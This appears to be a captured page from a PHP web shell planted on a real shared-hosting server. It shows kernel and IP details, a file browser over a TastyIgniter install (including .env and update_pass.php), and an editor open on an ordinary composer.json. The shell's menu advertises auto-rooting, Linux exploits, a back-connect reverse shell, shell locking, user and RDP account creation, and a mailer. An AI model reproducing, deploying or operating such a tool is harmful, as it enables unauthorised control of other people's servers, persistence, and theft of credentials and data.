Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.89
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
tastyigniter /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.env
721
B
-rw-r--r--
.htaccess
45
B
-rw-r--r--
_edit.php
4.5
KB
-rw-r--r--
_edit.xml
433
B
-rw-r--r--
clone.php
9.89
KB
-rw-r--r--
composer.json
2.65
KB
-rw-r--r--
extend.php
9.13
KB
-rw-r--r--
fileindex.php
296
B
-rw-r--r--
import.php
5.32
KB
-rw-r--r--
info.xml
5.37
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.22
KB
-rw-r--r--
install.xml
12.39
KB
-rw-r--r--
md5
1.88
KB
-rw-r--r--
notes.txt
1.48
KB
-rw-r--r--
tastyigniter.sql
120.3
KB
-rw-r--r--
tastyigniter.zip
48.11
MB
-rw-r--r--
update_pass.php
497
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "tastyigniter/tastyigniter", "description": "TastyIgniter is a free open source online ordering and restaurant management system", "type": "project", "keywords": [ "tastyigniter", "igniter", "restaurant", "ordering", "ecommerce", "opensource" ], "authors": [ { "name": "Samuel Adepoyigi", "email": "sam@sampoyigi.com", "role": "Creator" } ], "license": "MIT", "homepage": "https://tastyigniter.com", "support": { "paid": "https://tastyigniter.com/premium-support", "issues": "https://github.com/tastyigniter/TastyIgniter/issues", "forum": "https://forum.tastyigniter.com", "discord": "https/tastyigniter.com/discord", "docs": "https://tastyigniter.com/docs", "source": "https://github.com/tastyigniter/TastyIgniter" }, "repositories": { "tastyigniter": { "type": "composer", "url": "https://composer.tastyigniter.com" } }, "require": { "php": "^8.3", "laravel/framework": "^12.0", "laravel/tinker": "^2.10.1", "tastyigniter/core": "^4.0" }, "require-dev": { "fakerphp/faker": "^1.23", "laravel/pail": "^1.2.2", "laravel/pint": "^1.13", "laravel/sail": "^1.41", "mockery/mockery": "^1.6", "nunomaduro/collision": "^8.6", "phpunit/phpunit": "^11.5.3" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "@php artisan config:clear", "@php artisan clear-compiled", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ], "test": [ "@php artisan config:clear --ansi", "@php artisan test" ] }, "extra": { "laravel": { "dont-discover": [] } }, "minimum-stability": "dev", "prefer-stable": true, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true } }
Close